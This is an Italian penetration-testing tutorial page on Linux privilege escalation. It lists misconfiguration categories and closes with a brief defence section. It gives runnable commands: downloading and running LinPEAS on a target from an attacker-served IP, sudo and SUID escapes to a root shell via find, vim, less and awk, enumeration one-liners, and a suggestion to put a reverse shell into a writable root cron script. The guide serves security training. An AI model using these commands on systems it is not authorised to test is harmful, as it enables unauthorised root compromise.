Home › Post-Exploitation › Privesc Linux

Privilege Escalation — Linux

Fase 5: hai una shell da utente normale. Obiettivo: diventare root. Si vince trovando una configurazione sbagliata.

Teoria: dove si nasconde la strada

La privesc quasi mai è "un exploit magico": è trovare qualcosa mal configurato che ti dà più poteri di quelli che dovresti avere. Le categorie principali:

  • Sudo permissivo (puoi eseguire comandi come root).
  • Binari SUID (girano come il proprietario, spesso root).
  • Cron job scritti male (eseguiti da root a intervalli).
  • Capabilities pericolose, permessi di file sensibili, kernel vecchio.

Passo 1 — enumeration automatica

Scarica ed esegui LinPEAS: evidenzia in rosso/giallo tutte le possibili strade.

# sulla Kali: servi il file
python3 -m http.server 80
# sul target: scarica ed esegui
cd /tmp && wget http://TUO_IP/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

Passo 2 — controlli manuali (i più redditizi)

sudo -l

sudo -l   # cosa posso eseguire come root senza password?

Se un binario è elencato, cerca la via di fuga su GTFOBins. Esempio classico, se puoi fare sudo find:

sudo find . -exec /bin/sh \; -quit    # → shell di root

Altri esempi GTFOBins comuni:

sudo vim -c ':!/bin/sh'
sudo less /etc/profile   # poi digita  !/bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'

Binari SUID

find / -perm -4000 -type f 2>/dev/null

Per ogni binario "strano" (non standard) controlla GTFOBins nella sezione SUID. Es. con find SUID:

find . -exec /bin/sh -p \; -quit   # -p mantiene i privilegi

Cron job

cat /etc/crontab
ls -la /etc/cron.*

Se un cron di root esegue uno script scrivibile da te, ci metti dentro la tua reverse shell e aspetti.

Capabilities & kernel

getcap -r / 2>/dev/null       # es. python con cap_setuid → root
uname -a                       # versione kernel → cerca kernel exploit

Difesa

  • Minimo privilegio in sudoers; niente binari che "escapano" (vim, find, less...) via sudo.
  • Rimuovere SUID non necessari; niente script cron scrivibili da utenti.
  • Patch del kernel e dei pacchetti; audit periodici con strumenti come Lynis.
Risorsa d'oro: GTFOBins (dal tuo file siti) + HackTricks — Linux Privesc. Libri: Gray Hat Hacking, The Shellcoder's Handbook.